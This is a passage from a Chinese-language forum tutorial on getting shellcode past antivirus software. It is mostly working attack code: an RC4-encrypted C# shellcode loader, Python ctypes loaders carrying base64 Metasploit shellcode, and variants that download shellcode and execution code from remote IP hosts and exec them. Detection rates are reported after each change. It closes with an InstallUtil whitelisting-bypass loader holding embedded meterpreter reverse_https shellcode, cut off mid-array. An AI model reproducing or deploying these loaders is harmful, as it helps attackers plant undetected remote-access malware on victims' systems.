7,204,220,121,187,94,40,169,94,81,237,244,32,117,17,179,10,101,234,72,41,1,52,155,183,78,47,89,117,10,63,114,9,11,224,102,196,234,54,13,232,180,112,35,220,237,253,241,184,135,90,117,187,156,202,234,51,216,172,239,211,66,118,117,190,112,70,244,231,127,133,221,205,219,247,131,75,172,234,102,244,15,102,99,233,239,110,179,99,4,208,138,11,101,224,138,83,97,243,48,163,71,189,2,164,252,226,201,142,29,16,219,153,218,152,165,147,159,148,128,157,118,144,186,157,141,230,202,255,145,247,181,41,88,26,209,147,60,210,173,90,125,170,17,54,75,224,0,127,165,240,38,13,122,162,208,88,163,18,254,176,86,159,127,208,125,76,48,65,83,206,252,156,202,241,24,179,174,114,116,59,81,193,180,25,243,248,110,74,51,147,21,158,251,55,37,203,164,49,252,81,51,48,119,192,22,249,154,163,166,108,85,145,237,76,173,28,103,58,58,205,178,213,14,94,248,36,10,46,153,168,210,238,14,237,203,6,54,195,94,190,96,18,185,230,248,231,12,100,161,205,13,27,245,236,204,177,198,230,251,127,130,54,220,167,103,193,131,37,85,175,164,205,77,231,71,169,17,190,212,173,8,250,210,233,174,78,108,121,71,237,99,22,163,28,42,138,126,97,180,95,176,71,54,69,225,81,224,87,246,41,169,204,78,136,182,166,39,168,161,30,244,238,162,218,163,164,199,254,77,7,100,85,59,2,64,213,13,130,220,95,151,108,254,152,121,33,65,143,82,124,47,32,227,65,171,188,11,23,199,6,250,48,13,61,220,210,49,135,180,125,68,37,27,61,204,227,248,45,140,50,126,48,149,192,0,220,191,50,72,212,5,168,41,249,89,127,184,53,60,120,170,191,129,209,168,36,180,1,223,179,102,207,150,207,95,10,21,125,147,78,49,164,112,132,123,194,152,39,184,62,217,174,255,11,245,118,72,112,231,55,97,242,115,35,34,125,230,27,21,138,54,71,118,72,218,100,202,42,201,77,189,37,85,15,1,46,205,127,224,104,136,172,115,252,123,203,67,120,230,213,64,30,75,249,188,240,190,87,216,41,195,127,13,199,212,141,7,183,247,212,52,155,153,195,237,7,26,117,185,51,147,15,54,234,133,232,223,117,20,173,217,12,237,226,102,144,53,46,143,192,205,36,196,75,191,211,130,219,85,112,1,241,17,65,123,89,121,238,20,207,125,1,116,117,225,147,185,58,190,12,58,166,105,159,242,50,176,249,57,18,19,19,119,112,166,90,85,117,66,234,164,31,149,177,238,199,168,56,223,202,142,127,71,63,80,87,160,139,156,168,181,135"; string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(','); byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length]; for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++) { byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString()); _X_to_Bytes[i] = current; } // 解密密钥,可以更改,加解密源码中保持KEY一致就行 byte[] KEY = { 0x33, 0x11, 0x33, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x33, 0x01, 0x33, 0x33, 0x00, 0x00 }; byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes); // 加载shellcode IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40); Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length); CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0); Thread.Sleep(2000); } public static byte[] Decrypt(byte[] key, byte[] data) { return EncryptOutput(key, data).ToArray(); } private static byte[] EncryptInitalize(byte[] key) { byte[] s = Enumerable.Range(0, 256) .Select(i => (byte)i) .ToArray(); for (int i = 0, j = 0; i < 256; i++) { j = (j + key[i % key.Length] + s[i]) & 255; Swap(s, i, j); } return s; } private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data) { byte[] s = EncryptInitalize(key); int i = 0; int j = 0; return data.Select((b) => { i = (i + 1) & 255; j = (j + s[i]) & 255; Swap(s, i, j); return (byte)(b ^ s[(s[i] + s[j]) & 255]); }); } private static void Swap(byte[] s, int i, int j) { byte c = s[i]; s[i] = s[j]; s[j] = c; } [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); } } ``` 此时免杀率为26/67 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2a88eb135c9455c011f4bb3d3340219e0dc016d5.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2a88eb135c9455c011f4bb3d3340219e0dc016d5.png) 在shellcode免杀的过程中,混淆编码其实起到关键的作用,还有如base64、AES、XOR进行混淆加密,这类网上文章非常多,就不一一尝试。 打包器的选择 ------ 接下来将使用python来加载上面C的shellcode进行免杀尝试,利用原来powershell的免杀思路,首先将shellcode进行base64的编码,后解码执行。 ```php import ctypes import base64 encode_shellcode = ''' XHhmY1x4ZThceDg5XHgwMFx4MDBceDAwXHg2MFx4ODlceGU1XHgzMVx4ZDJceDY0XHg4Ylx4NTJceDMwXHg4Ylx4NTJceDBjXHg4Ylx4NTJceDE0XHg4Ylx4NzJceDI4XHgwZlx4YjdceDRhXHgyNlx4MzFceGZmXHgzMVx4YzBceGFjXHgzY1x4NjFceDdjXHgwMlx4MmNceDIwXHhjMVx4Y2ZceDBkXHgwMVx4YzdceGUyXHhmMFx4NTJceDU3XHg4Ylx4NTJceDEwXHg4Ylx4NDJceDNjXHgwMVx4ZDBceDhiXHg0MFx4NzhceDg1XHhjMFx4NzRceDRhXHgwMVx4ZDBceDUwXHg4Ylx4NDhceDE4XHg4Ylx4NThceDIwXHgwMVx4ZDNceGUzXHgzY1x4NDlceDhiXHgzNFx4OGJceDAxXHhkNlx4MzFceGZmXHgzMVx4YzBceGFjXHhjMVx4Y2ZceDBkXHgwMVx4YzdceDM4XHhlMFx4NzVceGY0XHgwM1x4N2RceGY4XHgzYlx4N2RceDI0XHg3NVx4ZTJceDU4XHg4Ylx4NThceDI0XHgwMVx4ZDNceDY2XHg4Ylx4MGNceDRiXHg4Ylx4NThceDFjXHgwMVx4ZDNceDhiXHgwNFx4OGJceDAxXHhkMFx4ODlceDQ0XHgyNFx4MjRceDViXHg1Ylx4NjFceDU5XHg1YVx4NTFceGZmXHhlMFx4NThceDVmXHg1YVx4OGJceDEyXHhlYlx4ODZceDVkXHg2OFx4NmVceDY1XHg3NFx4MDBceDY4XHg3N1x4NjlceDZlXHg2OVx4NTRceDY4XHg0Y1x4NzdceDI2XHgwN1x4ZmZceGQ1XHgzMVx4ZmZceDU3XHg1N1x4NTdceDU3XHg1N1x4NjhceDNhXHg1Nlx4NzlceGE3XHhmZlx4ZDVceGU5XHg4NFx4MDBceDAwXHgwMFx4NWJceDMxXHhjOVx4NTFceDUxXHg2YVx4MDNceDUxXHg1MVx4NjhceDcxXHgxN1x4MDBceDAwXHg1M1x4NTBceDY4XHg1N1x4ODlceDlmXHhjNlx4ZmZceGQ1XHhlYlx4NzBceDViXHgzMVx4ZDJceDUyXHg2OFx4MDBceDAyXHg0MFx4ODRceDUyXHg1Mlx4NTJceDUzXHg1Mlx4NTBceDY4XHhlYlx4NTVceDJlXHgzYlx4ZmZceGQ1XHg4OVx4YzZceDgzXHhjM1x4NTBceDMxXHhmZlx4NTdceDU3XHg2YVx4ZmZceDUzXHg1Nlx4NjhceDJkXHgwNlx4MThceDdiXHhmZlx4ZDVceDg1XHhjMFx4MGZceDg0XHhjM1x4MDFceDAwXHgwMFx4MzFceGZmXHg4NVx4ZjZceDc0XHgwNFx4ODlceGY5XHhlYlx4MDlceDY4XHhhYVx4YzVceGUyXHg1ZFx4ZmZceGQ1XHg4OVx4YzFceDY4XHg0NVx4MjFceDVlXHgzMVx4ZmZceGQ1XHgzMVx4ZmZceDU3XHg2YVx4MDdceDUxXHg1Nlx4NTBceDY4XHhiN1x4NTdceGUwXHgwYlx4ZmZceGQ1XHhiZlx4MDBceDJmXHgwMFx4MDBceDM5XHhjN1x4NzRceGI3XHgzMVx4ZmZceGU5XHg5MVx4MDFceDAwXHgwMFx4ZTlceGM5XHgwMVx4MDBceDAwXHhlOFx4OGJceGZmXHhmZlx4ZmZceDJmXHg0YVx4NzdceDVhXHg0MVx4MDBceDdjXHgwOVx4NzNceDc1XHhhYlx4ZThceGFkXHhhNlx4NzBceGE3XHhlOVx4MzlceDhiXHhlM1x4MTNceDMyXHhjMFx4MzRceDU2XHhjNVx4OWZceDk2XHg0YVx4ZmNceDg1XHgzN1x4ZDVceDUwXHgzN1x4OGVceDI0XHg4Y1x4MjZceDM4XHg0MVx4NzJceDgzXHhkM1x4NWNceDA1XHhiYVx4OTZceGVhXHgzZlx4NTZceDE3XHhkY1x4OTZceGU0XHhjZFx4YTdceGU5XHgzMlx4NTBceGYxXHg2ZFx4YTJceGQxXHg1MVx4NDdceGM0XHg0Y1x4YzZceDk3XHhjNFx4ZDdceGY2XHgzMFx4OThceGJjXHgxMFx4MGFceGFiXHgwMFx4NTVceDczXHg2NVx4NzJceDJkXHg0MVx4NjdceDY1XHg2ZVx4NzRceDNhXHgyMFx4NGRceDZmXHg3YVx4NjlceDZjXHg2Y1x4NjFceDJmXHgzNFx4MmVceDMwXHgyMFx4MjhceDYzXHg2Zlx4NmRceDcwXHg2MVx4NzRceDY5XHg2Mlx4NmNceDY1XHgzYlx4MjBceDRkXHg1M1x4NDlceDQ1XHgyMFx4MzdceDJlXHgzMFx4M2JceDIwXHg1N1x4NjlceDZlXHg2NFx4NmZceDc3XHg3M1x4MjBceDRlXHg1NFx4MjBceDM1XHgyZVx4MzFceDNiXHgyMFx4MmVceDRlXHg0NVx4NTRceDM0XHgyZVx4MzBceDQzXHgzYlx4MjBceDJlXHg0ZVx4NDVceDU0XHgzNFx4MmVceDMwXHg0NVx4M2JceDIwXHgyZVx4NGVceDQ1XHg1NFx4MjBceDQzXHg0Y1x4NTJceDIwXHgzMlx4MmVceDMwXHgyZVx4MzVceDMwXHgzN1x4MzJceDM3XHgyOVx4MGRceDBhXHgwMFx4NDJceGJjXHhlZFx4MGFceDgyXHhmMFx4NjdceGJhXHhjMVx4ZGNceDg5XHgzOFx4ZWJceDMzXHg5ZVx4MzRceDcwXHg1OFx4YWZceGY3XHhkZFx4MWFceDVkXHg5OVx4ODNceDI5XHg4Zlx4ZjNceDMzXHgyOFx4ODJceDgxXHg1MVx4OTFceDQxXHg1ZFx4NWZceGJlXHg0MVx4NTZceDZiXHgxOFx4MzlceGE1XHg2MVx4YTJceDliXHhlOVx4ZDlceDNhXHhhMFx4ZjBceGJmXHg4Ylx4NDBceGQ3XHg0ZVx4NGJceDkwXHhlOFx4YTdceGYwXHhiY1x4NzBceGU2XHg3OVx4OWVceDcwXHg5YVx4ZGJceDFjXHgyMVx4ODFceGM0XHg5ZFx4YjFceGM5XHg1YVx4ZGRceGFiXHhiNFx4OGZceDViXHgyYVx4MGRceDBlXHgzM1x4NjRceGE4XHg5Nlx4Y2FceGQ0XHhmZVx4OWJceDc3XHhiMlx4ODdceDE3XHgzMVx4ZmVceDVmXHg5OFx4YTNceGFlXHg2OVx4MzBceDVhXHg3Nlx4YzRceDI0XHg2Mlx4MzBceDM5XHgzMVx4NTlceDM1XHhkNlx4YWJceGRlXHhiMFx4YjJceDhhXHg4YVx4YTFceGRjXHhkOFx4MjRceGQ4XHg0OFx4YWJceDQzXHg4ZFx4NmNceDU4XHgyY1x4YjBceDU5XHg5N1x4YTVceGExXHhjMVx4OGRceDI1XHg0ZFx4ZGRceGQ0XHg4Y1x4MzFceGQ2XHg2MVx4MjFceGU1XHhmMFx4ZWJceDUyXHgyOFx4ZmFceGFlXHg3ZVx4NGZceGEwXHg0Nlx4NzNceGEwXHg1NFx4NTFceGQzXHgyM1x4NzNceGM4XHhiMFx4MjJceDZiXHg4N1x4OWNceDBmXHg4ZVx4MTRceGRiXHg4MVx4NmRceDRiXHg4N1x4MzNceGQxXHgzMlx4NTBceGY4XHg1MFx4NmJceDFmXHhjY1x4MDFceDczXHg4OVx4MzhceGQ4XHg3Mlx4MDBceDY4XHhmMFx4YjVceGEyXHg1Nlx4ZmZceGQ1XHg2YVx4NDBceDY4XHgwMFx4MTBceDAwXHgwMFx4NjhceDAwXHgwMFx4NDBceDAwXHg1N1x4NjhceDU4XHhhNFx4NTNceGU1XHhmZlx4ZDVceDkzXHhiOVx4MDBceDAwXHgwMFx4MDBceDAxXHhkOVx4NTFceDUzXHg4OVx4ZTdceDU3XHg2OFx4MDBceDIwXHgwMFx4MDBceDUzXHg1Nlx4NjhceDEyXHg5Nlx4ODlceGUyXHhmZlx4ZDVceDg1XHhjMFx4NzRceGM2XHg4Ylx4MDdceDAxXHhjM1x4ODVceGMwXHg3NVx4ZTVceDU4XHhjM1x4ZThceGE5XHhmZFx4ZmZceGZmXHgzNFx4MzdceDJlXHgzMVx4MzFceDMzXHgyZVx4MzJceDMxXHgzN1x4MmVceDMxXHgzMlx4MzhceDAwXHgxMlx4MzRceDU2XHg3OA== ''' shellcode = base64.b64decode(encode_shellcode) #print(shellcode) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1) ``` 由于python主要有两个打包器,这里首先选择pyinstaller进行打包python文件 `python3 pyinstaller.exe -F -w cbase64.py` 此时免杀率为3/44 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2df1474f934df6c33dd4ffb655081b83eac1324a.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2df1474f934df6c33dd4ffb655081b83eac1324a.png) 这里使用py2exe打包python文件 `python3 py2exebao.py py2exe` ```php from distutils.core import setup import py2exe setup(console=['py2execbase64.py'])//这个是存放上面代码的文件名 ``` 这里免杀率为9/66 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bd0a24b197e62147deefaf1a8846fc579abffb9d.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bd0a24b197e62147deefaf1a8846fc579abffb9d.png) 通过上面的现象可知,打包器的选择影响了免杀率 shellcode分离 ----------- 将上述的shellcode base64编码后放置服务器,使用无文件落地方式来进行处理,为了提高免杀率,我们首先使用某绒进行扫描,来手工特征码定位,直接一段一段代码删除,每次都使用杀毒软件查杀,就可以定位特征码(exe程序定位特征码后面会介绍) 通过查杀发现`ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))`为特征码,进行base64加密 `pyinstaller.exe -F -w alwu.py` ```php import ctypes import requests import base64 encode_shellcode = requests.get("http://www.xiaodi8.com/123.txt").text shellcode = base64.b64decode(encode_shellcode) #print(shellcode) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) func=base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSk=') exec(func) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1) ``` 此时免杀率为6/65 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0779b623dfbf4bb10fb2323e1867571474059670.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0779b623dfbf4bb10fb2323e1867571474059670.png) 在这里我也尝试了替换图标,但发现并未有影响,所以就没有贴图出来,这里要说明一点在常用的渗透工具中,图标还是有影响的如mimikatz。后面我自己又去尝试,在命名变量的时候我们总是喜欢见名之义,比如这里的encode\_shellcode和shellcode,但是当我去替换成其他不怎么熟悉的字符串时,发现查杀率降低,所以说变量的命名时也要注意。 ```php import ctypes import requests import base64 mk = requests.get("http://47.113.217.128/66.txt").text//encode_shellcode替换成了mk mksec = base64.b64decode(mk) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(mksec), 0x1000, 0x40) sha=base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihta3NlYyksIGxlbihta3NlYykp') exec(sha) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1) ``` 这里为4/65 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5a9a0816bf878cdb9a9336108c7eecb8373aa574.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5a9a0816bf878cdb9a9336108c7eecb8373aa574.png) 继续尝试我将上面的shellcode和执行代码全部放置远程服务器 ```php import ctypes import requests import base64 mk = requests.get("http://47.113.217.128/66.txt").text mksec = base64.b64decode(mk) init=requests.get("http://47.113.217.128/12.txt").text head=base64.b64decode(init) exec(head) ``` 此时的查杀率为2/63 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-12ec2a911098a305bf26b4f42d9d10237220b0a5.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-12ec2a911098a305bf26b4f42d9d10237220b0a5.png) 借助工具混淆 ------ 安装gcc环境 下载地址:<https://github.com/jmeubank/tdm-gcc/releases/download/v9.2.0-tdm64-1/tdm64-gcc-9.2.0.exe> AV\_Evasion\_Tool 下载地址:[https://github.com/dayuxiyou/AV\_Evasion\_Tool/tags](https://github.com/dayuxiyou/AV_Evasion_Tool/tags) 这里建议下载源码使用Visual Studio 2017进行编译,因为直接下载的exe功能很少,我已经放置网盘 链接:<https://pan.baidu.com/s/1XwUVUlGq1SVimGbBphN0LQ> 提取码:gqut 选择直接执行VirtualAlloc,将上述的C shellcode放置到下方 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-ed36b97c95e69aeef98c46faf3fe8be2531614f0.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-ed36b97c95e69aeef98c46faf3fe8be2531614f0.png) 此时免杀率为25/67 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-98e35bfe50e7a7a1c862391f375c265e90db1262.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-98e35bfe50e7a7a1c862391f375c265e90db1262.png) 选择直接执行VirtualProtect [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-4e6621cec6870b4bc25c1ed8e6b8a0a358006d1e.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-4e6621cec6870b4bc25c1ed8e6b8a0a358006d1e.png) 免杀率为10/54 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cd87273089cb0b3a52599766fc867636245b4581.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cd87273089cb0b3a52599766fc867636245b4581.png) 混淆编码的工具非常多,这个工具是直接生成了exe,可以使用一些只对部分代码进行混淆的工具,然后自己再编译成exe,可以达到很好效果,这里可以参考我那篇powershell免杀思路。 白名单执行 ----- 技术参考:<https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/> csc 简单来讲,其实就是个c# 的命令行编译工具,专门用来编译\*.cs文件用的 installutil 微软官方给的解释,它允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,暂且就简单把它理解成windows内置的一种命令行安装工具就行 存储目录:C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727 编译执行: `csc /unsafe /platform:x86 /out:d:\mksec.exe InstallUtil-ShellCode.cs` //这里直接使生成exe,肯定一下就被查杀 `csc /unsafe /platform:x86 /out:d:\mksec.jpg InstallUtil-ShellCode.cs` //生成jpg图片格式 ```php using System; using System.Net; using System.Diagnostics; using System.Reflection; using System.Configuration.Install; using System.Runtime.InteropServices; /* Author: Casey Smith, Twitter: @subTee License: BSD 3-Clause Step One: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs Step Two: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe (Or) C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main(). Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls. We believe the root issue here is: The root issue here with Assembly.Load() is that at the point at which execute operations are detected (CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation. Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection), which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access. The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback. Its not really an exploit, but just a creative way to launch an exe/assembly. */ //root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt public class Program { public static void Main() { Console.WriteLine("Hello From Main...I Don't Do Anything"); //Add any behaviour here to throw off sandbox execution/analysts :) } } [System.ComponentModel.RunInstaller(true)] public class Sample : System.Configuration.Install.Installer { //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. public override void Uninstall(System.Collections.IDictionary savedState) { Shellcode.Exec(); } } public class Shellcode { public static void Exec() { // native function's compiled code // generated with metasploit byte[] shellcode = new byte[799] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x71, 0x17, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x64, 0x56, 0x52, 0x50, 0x00, 0x35, 0x0f, 0xe8, 0x63, 0x49, 0x81, 0x57, 0xa6, 0x1f, 0x01, 0x92, 0xc2, 0x44, 0xdb, 0x17, 0x91, 0x57, 0x71, 0x61, 0xbe, 0xc0, 0x48, 0x6c, 0x45, 0xd1, 0x98, 0x27, 0x18, 0xcd, 0x4b, 0xef, 0x5e, 0x17, 0x35, 0xa9, 0xc8, 0x73, 0x6d, 0x1f, 0x7c, 0x40, 0x8d, 0xbd, 0xf8, 0x14, 0x28, 0xc8, 0x86, 0xad, 0xc5, 0xe0, 0xfc, 0xe2, 0x8d, 0x59, 0x02, 0xe7, 0x00, 0xb4, 0xaa, 0xdd, 0x52, 0xba, 0xb9, 0xb4, 0x85, 0xe9, 0x55, 0x2a, 0x65, 0xf3, 0x22, 0xf6, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x37, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x35, 0x2e, 0x31, 0x3b, 0x20, 0x2e, 0x4e, 0x45, 0x54, 0x20, 0x43, 0x4c, 0x52, 0x20, 0x32, 0x2e, 0x30, 0x2e, 0x35, 0x30, 0x37, 0x32, 0x37, 0x3b, 0x20, 0x49, 0x6e, 0x66, 0x6f, 0x50, 0x61, 0x74, 0x68, 0x2e, 0x32, 0x29, 0x0d, 0x0a, 0x00, 0x9b, 0x0e, 0x83, 0xb9, 0x92, 0xe5, 0x66, 0x91, 0x12, 0xc8, 0x7f, 0x1f, 0x84, 0x07, 0x1d, 0xf0, 0x76, 0xb1, 0xe8, 0x74, 0x8b, 0x01, 0xd1, 0x64, 0xee, 0xcb, 0xed, 0x71, 0x8e, 0xc8, 0xc4, 0x8e, 0x59, 0x35, 0x74, 0x38, 0x1e, 0x66, 0x3a, 0x75, 0x39, 0x31, 0x01, 0x93, 0x0e, 0x7c, 0xa5, 0xc3, 0x96, 0xca, 0xa8, 0x62, 0xc0, 0x35, 0x52, 0x96, 0xfd, 0x52, 0x8e, 0x66, 0xac, 0xa5, 0x59, 0xc1, 0x6b, 0xaf, 0xd4, 0x8f, 0xa0, 0x2d, 0x79, 0x6f, 0x0e, 0x45, 0x0a, 0xb3, 0xce, 0xe1, 0xb1, 0xd4, 0x28, 0xfc, 0x90, 0x67, 0x65, 0x96, 0xb5, 0xa7, 0x46, 0xf0, 0x35, 0x26, 0x46, 0x37, 0x06, 0x30, 0x12, 0xbf, 0x1a, 0x59, 0x7b, 0xf6, 0xea, 0xca, 0x6b, 0x8c, 0x57, 0xdc, 0x0e, 0x17, 0x2c, 0x0c, 0xa2, 0x78, 0xb5, 0x5e, 0x57, 0x56, 0x5b, 0x54, 0xd7, 0xf9, 0x2b, 0xed, 0x08, 0x47, 0xba, 0xca, 0xa6, 0xd9, 0x41, 0xb4, 0x72, 0x0f, 0x3b, 0xba, 0x7f, 0x95, 0x56, 0x30, 0x21, 0xe5, 0x63, 0xe3, 0xaa, 0x9c, 0xd8, 0xd3, 0xbc, 0x41, 0xb8, 0x34, 0xd3, 0xbf, 0x37, 0xc6, 0x16, 0xe9, 0x65, 0x7a, 0x66, 0x06, 0x06, 0xda, 0x78, 0x8b, 0x72, 0x43, 0x44, 0xe9, 0xb1, 0x94, 0x67, 0x37, 0x1b, 0x2c, 0xe6, 0x49, 0x0a, 0xf3, 0x92, 0x71, 0x89, 0x8b, 0xae, 0xb0, 0x91, 0xcb, 0x1a, 0xc8, 0xd3, 0xb7, 0x5a, 0x81, 0xfe, 0x30, 0x13, 0xcb, 0x7f, 0x40, 0xa8, 0x9c, 0x44, 0x08, 0xf3, 0xd1, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 